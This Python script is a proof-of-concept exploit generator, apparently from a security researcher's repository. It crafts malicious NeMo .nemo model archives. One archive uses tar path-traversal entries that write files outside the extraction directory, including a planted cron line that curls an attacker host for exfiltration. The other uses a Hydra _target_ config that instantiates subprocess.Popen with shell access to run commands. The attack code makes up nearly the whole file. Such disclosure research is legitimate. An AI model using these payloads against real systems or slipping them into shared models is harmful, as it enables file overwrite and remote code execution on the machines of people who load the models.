exploits / nemo /craft_malicious_nemo.py
Zeiyre's picture
Upload nemo/craft_malicious_nemo.py with huggingface_hub
20db0ae verified
"""
PoC: NeMo Path Traversal + Hydra _target_ Injection
=====================================================
Crafts malicious .nemo files demonstrating two vulnerabilities:
1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
2. Hydra Injection: _target_ field in config instantiates arbitrary classes
Usage:
python craft_malicious_nemo.py # Generate both PoCs
python craft_malicious_nemo.py --type traversal # Path traversal only
python craft_malicious_nemo.py --type hydra # Hydra injection only
python craft_malicious_nemo.py --verify # Show archive contents
This is for authorized security research only.
"""
import tarfile
import io
import os
import argparse
def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
"""
Create a .nemo file with path traversal in tar entry names.
When model_utils.load_config() or save_artifacts() processes this file,
tar.extract() writes files outside the intended directory because
_safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py).
"""
with tarfile.open(output_path, "w:") as tar:
# 1. Legitimate model_config.yaml (required for detect_prefix())
config_content = b"""model:
name: poc_path_traversal
target: nemo_test
class_path: nemo.collections.asr.models.EncDecCTCModel
"""
config_info = tarfile.TarInfo(name="model_config.yaml")
config_info.size = len(config_content)
tar.addfile(config_info, io.BytesIO(config_content))
# 2. Path traversal entry — escapes extraction directory
# When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
# the prefix from detect_prefix() is "", so it extracts "model_config.yaml"
# But save_artifacts extracts arbitrary artifact paths from the tar,
# and a crafted artifact path can escape.
payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"
# Traversal via artifact name
traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
traversal_info.size = len(payload)
tar.addfile(traversal_info, io.BytesIO(payload))
# Additional traversal — overwrite a more dangerous location
payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
traversal_info2.size = len(payload2)
tar.addfile(traversal_info2, io.BytesIO(payload2))
file_size = os.path.getsize(output_path)
print(f"[+] Path traversal .nemo written to: {output_path}")
print(f" Size: {file_size} bytes")
print()
print(" Tar contents:")
with tarfile.open(output_path, "r:") as tar:
for member in tar.getmembers():
escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
print(f" {member.name}{escape}")
print()
print("[!] When loaded by nemo.utils.model_utils.load_config():")
print(" tar.extract() has NO path validation (_safe_extract not used)")
print(" Files are written outside the temp extraction directory")
return output_path
def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
"""
Create a .nemo file with Hydra _target_ injection in config.
When setup_optimization() processes this config, it calls
hydra.utils.instantiate() with the attacker-controlled _target_,
which can point to subprocess.Popen or any importable class.
"""
# Config with malicious _target_ pointing to subprocess.Popen
config_content = b"""model:
name: poc_hydra_injection
target: nemo_test
optim:
_target_: subprocess.Popen
args:
- "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
shell: true
sched:
name: CosineAnnealing
warmup_steps: 100
"""
with tarfile.open(output_path, "w:") as tar:
config_info = tarfile.TarInfo(name="model_config.yaml")
config_info.size = len(config_content)
tar.addfile(config_info, io.BytesIO(config_content))
# Add a dummy weights file to look like a real .nemo
weights = b"\x00" * 64
weights_info = tarfile.TarInfo(name="model_weights.ckpt")
weights_info.size = len(weights)
tar.addfile(weights_info, io.BytesIO(weights))
file_size = os.path.getsize(output_path)
print(f"[+] Hydra injection .nemo written to: {output_path}")
print(f" Size: {file_size} bytes")
print()
print(" Tar contents:")
with tarfile.open(output_path, "r:") as tar:
for member in tar.getmembers():
print(f" {member.name}")
print()
print(" Malicious config excerpt:")
print(" optim:")
print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
print(" shell: true")
print()
print("[!] When loaded by NeMo and setup_optimization() is called:")
print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
return output_path
def main():
parser = argparse.ArgumentParser(description="NeMo PoC generator")
parser.add_argument("--type", choices=["traversal", "hydra", "both"],
default="both", help="Which PoC to generate")
parser.add_argument("--verify", action="store_true",
help="Show archive contents after generation")
parser.add_argument("--output-dir", default=".", help="Output directory")
args = parser.parse_args()
paths = []
if args.type in ("traversal", "both"):
path = craft_path_traversal_nemo(
os.path.join(args.output_dir, "path_traversal.nemo"))
paths.append(path)
print()
if args.type in ("hydra", "both"):
path = craft_hydra_injection_nemo(
os.path.join(args.output_dir, "hydra_injection.nemo"))
paths.append(path)
print()
if args.verify:
for path in paths:
print(f"=== Verifying {path} ===")
with tarfile.open(path, "r:") as tar:
for member in tar.getmembers():
print(f" {member.name} ({member.size} bytes)")
if member.name == "model_config.yaml":
f = tar.extractfile(member)
if f:
print(f" Config preview:")
for line in f.read().decode().split("\n")[:10]:
print(f" {line}")
print()
if __name__ == "__main__":
main()